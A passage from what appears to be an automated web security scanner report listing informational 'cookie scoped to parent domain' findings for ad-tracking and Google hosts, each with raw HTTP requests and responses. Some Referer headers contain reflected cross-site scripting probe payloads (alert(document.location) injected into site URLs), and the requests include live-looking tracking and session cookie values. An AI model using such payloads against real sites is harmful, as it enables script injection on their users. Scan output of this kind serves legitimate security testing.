GIF89a...................!.......,...........T..;

10.18. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/d3/jsc/gl.js?k5xiThcyanucBq9IXvhSGSz5~090311 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24; FFcat=826,622,14:1545,8,14:826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0:0:0; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm768Zb43199; aps=2
If-None-Match: "436874d-5d7-4aa4ddaecd340"

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Tue, 11 Sep 2012 12:49:18 GMT;domain=.zedo.com;path=/;
ETag: "9e27dc-5d7-4aa4ddaecd340"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=419812
Expires: Sat, 17 Sep 2011 09:26:10 GMT
Date: Mon, 12 Sep 2011 12:49:18 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

10.19. http://d7.zedo.com/img/bh.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://rs.gwallet.com/r1/pixel/x420r5075003
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm768Zb43199; aps=2; FFgeo=5386156; FFcat=933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=1:0:0:0:0:0:0; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Sun, 11 Dec 2011 12:49:31 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=985B826,20|121_977#0;expires=Tue, 11 Sep 2012 12:49:31 GMT;domain=.zedo.com;path=/;
ETag: "1b6340a-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=8401
Expires: Mon, 12 Sep 2011 15:09:32 GMT
Date: Mon, 12 Sep 2011 12:49:31 GMT
Connection: close

GIF89a.............!.......,...........D..;



10.20. http://d7.zedo.com/utils/ecSet.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h484782Za669088Zc826000622%2C826000622Zs403Zt1255Zm768Zb43199&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24; FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h484782Za669088Zc826000622,826000622Zs403Zt1255Zm768Zb43199;expires=Wed, 12 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=945
Date: Mon, 12 Sep 2011 12:48:46 GMT
Connection: close



10.21. http://dts1.raasnet.com/dts/bizo/in

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/bizo/in

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/bizo/in?industry=business_services&location=texas HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:08 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


10.22. http://dts1.raasnet.com/dts/exelate/in

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/exelate/in

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/exelate/in?segments=&t=i HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


10.23. http://dts1.raasnet.com/dts/targus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/targus

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/targus?segment=000&zip=&fage=&fgender=&fts=&sage=&sgender=&sts= HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


10.24. http://f21.360tag.com/t6/1418/MTV/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://f21.360tag.com
Path:   /t6/1418/MTV/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t6/1418/MTV/?rf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&l=en-US&pg=http%3A%2F%2Fwww.mtv.co.uk%2Ffiles4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&pl=Win32&cd=16&rs=1920x1200&tz=300&je=true&rn=1405901022&at=PageView&tv=1&t360_T=2&t360_RN2=1967621374&t360_Referrer=&txd=360tag.com HTTP/1.1
Host: f21.360tag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: t1=N1

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private,no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://www.googleadservices.com/pagead/conversion/1066373836/?label=hLH-CJz7gQIQzKW-_AM&guid=ON&script=0
Set-Cookie: tguid=d37d83f3-b7f3-4436-ae61-5a4ec6697d9e; domain=.360tag.com; expires=Sun, 12-Sep-2021 13:05:06 GMT; path=/
Set-Cookie: tid=0; domain=.360tag.com; expires=Sun, 11-Sep-2011 13:05:06 GMT; path=/
Set-Cookie: sguid=466d899d-3f45-470d-9e6b-6f8d7ed32ebd; domain=.360tag.com; path=/
X-Powered-By: PHP/5.2.11
Server: Apache/2.2.14
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC", policyref="http://www.360tag.com/w3c/p3p.xml"
Date: Mon, 12 Sep 2011 13:05:05 GMT
Content-Length: 0


10.25. http://id.google.com/verify/EAAAABWZtieoFhZd9XdhbVhtYuQ.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAABWZtieoFhZd9XdhbVhtYuQ.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAABWZtieoFhZd9XdhbVhtYuQ.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ciphertext+data+security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=VxiZX7aDTPwjxYwwBhemPWg4il135P9dB2f5oOVsmg=O6gY64Xq_XczkJ5S; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=MmnHHrVyllkn5fUstvfqnPtDp4u0CWWdVJvI2wnRNCbJ0VTX3xRmmWIdcUNum52LGTHmJ4SicY09qkVQjFkDETjGrBCKXQoY7-i_aw4mT0NH1g_cavbeS6OkojcbVt7T

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=51=yIRx5Ncw2Xe2RRfVKKbf2FR3nodRYFt3JPr2L80Fxg=WeGf3ZdyaGOKCq62; expires=Tue, 13-Mar-2012 12:41:17 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:41:17 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.26. http://id.google.com/verify/EAAAAM9br7WwFClt2Y62Ukg62vk.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAM9br7WwFClt2Y62Ukg62vk.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAM9br7WwFClt2Y62Ukg62vk.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/blank.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=51=yIRx5Ncw2Xe2RRfVKKbf2FR3nodRYFt3JPr2L80Fxg=WeGf3ZdyaGOKCq62; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=MmnHHrVyllkn5fUstvfqnPtDp4u0CWWdVJvI2wnRNCbJ0VTX3xRmmWIdcUNum52LGTHmJ4SicY09qkVQjFkDETjGrBCKXQoY7-i_aw4mT0NH1g_cavbeS6OkojcbVt7T

Response

HTTP/1.1 200 OK
Set-Cookie: NID=51=Lh__unmUq20T1IIqPNby3lnxFSUZGdvQ5_BieXTCVwXmSNjk57-to0QCiQto54PtZva07UOavPS_hgWY0dmvp105NE76_GwJkql9ucFgdgF_oJRWulkjljosco7JuoGh; expires=Tue, 13-Mar-2012 12:41:23 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:41:23 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.27. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=0 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_22=488-pcv:1|uid:2925993182975414771; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:57 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

10.28. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:38 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315831718_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:38 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 554

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2D
...[SNIP]...

10.29. http://imp.fetchback.com/serve/fb/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:39 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315831719_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1315831719; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2



10.30. http://load.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/?p=104&g=250&j=0 HTTP/1.1
Host: load.exelator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
